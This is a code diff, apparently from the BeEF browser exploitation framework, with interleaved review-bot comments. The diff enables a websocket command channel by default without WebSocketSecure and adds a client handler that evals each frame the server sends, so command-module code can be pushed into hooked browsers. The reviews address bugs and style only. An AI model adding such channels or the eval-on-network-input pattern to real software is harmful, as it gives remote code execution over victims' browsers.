diff --git a/config.yaml b/config.yaml
index bd913a9fe..baca65fa8 100644
--- a/config.yaml
+++ b/config.yaml
@@ -38,7 +38,7 @@ beef:
 hook_session_name: "BEEFHOOK"
 session_cookie_name: "BEEFSESSION"
 websocket:
- enable: false
+ enable: true
 secure: false # use WebSocketSecure
 port: 11989
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index a3cb1e0d7..3aedee96b 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -23,7 +23,7 @@ beef.updater = {
 // Low timeouts combined with the way the framework sends commamd modules result
 // in instructions being sent repeatedly or complex code.
 // If you suffer from ADHD, you can decrease this setting.
- timeout: 1000,
+ timeout: 5000,
 // A lock.
 lock: false,
diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 547809ebc..e0e17ec82 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -47,9 +47,11 @@ beef.websocket = {
 }
 this.socket.onmessage = function (message){
 //@todo append the command to head in
- console.log("We recive a message "+message.data);
+ console.log("We recive a message ' "+message.data+"'");
+ eval("'"+message.data +"'");
- }
+ /*END POC*/
+ }
 },
diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index d8d189914..e82d9b5fc 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
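Review bot: Setting `enable: true` in the shipped default turns the websocket channel on for every install while `secure: false` stays on the following line, so by default the channel presumably runs without WebSocketSecure. The client handler touched by this same commit (core/main/client/websocket.js) is still marked `/*END POC*/`, which suggests the feature is not ready to be a default. Consider keeping the default off and documenting the opt-in, e.g. `enable: false # experimental; enable only together with secure: true`.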
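Review bot: `eval("'"+message.data +"'")` wraps the received frame in single quotes before evaluating it, so a frame without a quote evaluates to a plain string, while a frame containing `'` or a line break either throws a SyntaxError that nothing in `onmessage` catches or changes what gets evaluated. The handler should document what a frame is expected to contain and fail closed on anything else, for example by placing the call inside `try { ... } catch (e) { console.log("websocket frame rejected: " + e); }` with a comment stating the quoting contract. With `secure: false` in config.yaml the frames presumably arrive over plain ws://, and nothing visible here checks a frame before it is evaluated. The `/*END POC*/` marker has no matching start marker in the hunk, and the surrounding function continues outside it.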
@@ -50,11 +50,31 @@ module BeEF
 build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
 let= BeEF::Core::Websocket::Websocket.instance
 #@todo radoen debug this one
- exist= let.getsocket(hooked_browser.session)
- if exist != nil
- let.sent(command_module.output, hooked_browser.session)
+ if let.getsocket(hooked_browser.session)
+
+ funtosend=command_module.output.gsub("beef.execute(function()","")
+ funtosend=funtosend.gsub("});", "")
+ funtosend=funtosend.gsub("{", "")
+ funtosend=funtosend.gsub('//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//',"")
+ let.sent(funtosend, hooked_browser.session)
+ print_info("We are sending #{funtosend}")
 else
+ print_info("not in else")
 @body << command_module.output + "\n\n"
 end
diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb
index f9453c1f9..b52b48be7 100644
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -27,7 +27,6 @@ module BeEF
 def initialize
- print_info("/n In activesocket we have #{@@activeSocket}")
 config = BeEF::Core::Configuration.instance
 port = config.get("beef.http.websocket.port")
 secure = config.get("beef.http.websocket.secure")
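Review bot: `funtosend.gsub("{", "")` deletes every opening brace in the module output, not only the one that opens the `beef.execute(function()` wrapper, and `gsub("});", "")` likewise removes every `});` rather than the closing one, so any module body containing an object literal, a block or a nested callback is sent with unbalanced braces. Assuming the wrapper appears once around the body, anchoring the two removals keeps the body intact, e.g. `funtosend = command_module.output.sub(/beef\.execute\(function\(\)\s*\{/, "")` followed by `funtosend = funtosend.sub(/\}\);\s*\z/, "")`; the pasted license header would also be easier to maintain as a named constant than as a multi-line literal that must match byte for byte. `print_info("We are sending #{funtosend}")` writes the whole payload to the console at info level and `print_info("not in else")` is printed from inside the `else` branch; both look like debugging leftovers that belong in `print_debug` or should be removed. The enclosing method starts and ends outside the hunk.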
@@ -50,7 +49,7 @@ module BeEF
 if(/BEEFHOOK=/.match(message))
 print_info("Browser #{ws.origin} says helo! ws is running")
 #insert new connection in activesocket
- @@activeSocket["#{message.split(/BEEFHOOK=/)}"] = ws
+ @@activeSocket["#{message.split(/BEEFHOOK=/)[1]}"] = ws
 print_debug("In activesocket we have #{@@activeSocket}")
 end
 end
@@ -60,7 +59,11 @@ module BeEF
 end
 #@note used in command.rd return nill if browser is not in list else giveback websocket
 def getsocket (browser_id)
- @@activeSocket[browser_id]
+ if ( @@activeSocket[browser_id] != nil)
+ true
+ else
+ false
+ end
 end
 #@note send a function to hooked and ws browser
 def sent (fn ,browser_id )
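Review bot: The key stored by `@@activeSocket["#{message.split(/BEEFHOOK=/)[1]}"] = ws` is everything that follows `BEEFHOOK=` in the peer's message, so any trailing text (another cookie, a closing quote or brace) becomes part of the key and the lookup by `hooked_browser.session` in command.rb would then miss. The value is also accepted from the peer without checking that it names a known session, so a later connection sending the same id replaces the socket already registered for it. Extracting only the token and ignoring unknown ids would address both, e.g. `id = message[/BEEFHOOK=(\w+)/, 1]` (assuming ids are alphanumeric) and then `@@activeSocket[id] = ws if id` after a check against the known sessions. The enclosing block starts outside the hunk.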
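Review bot: The `#@note` line above `getsocket` still says it returns nil or the websocket, but the new body returns `true`/`false`, so both the comment and the method name now describe something the method no longer does. The five-line `if ... != nil` / `true` / `else` / `false` can be the single expression `!@@activeSocket[browser_id].nil?`, and the comment could read `#@note used in command.rb: true if a websocket is registered for browser_id, false otherwise`. The body of `sent` continues outside the hunk.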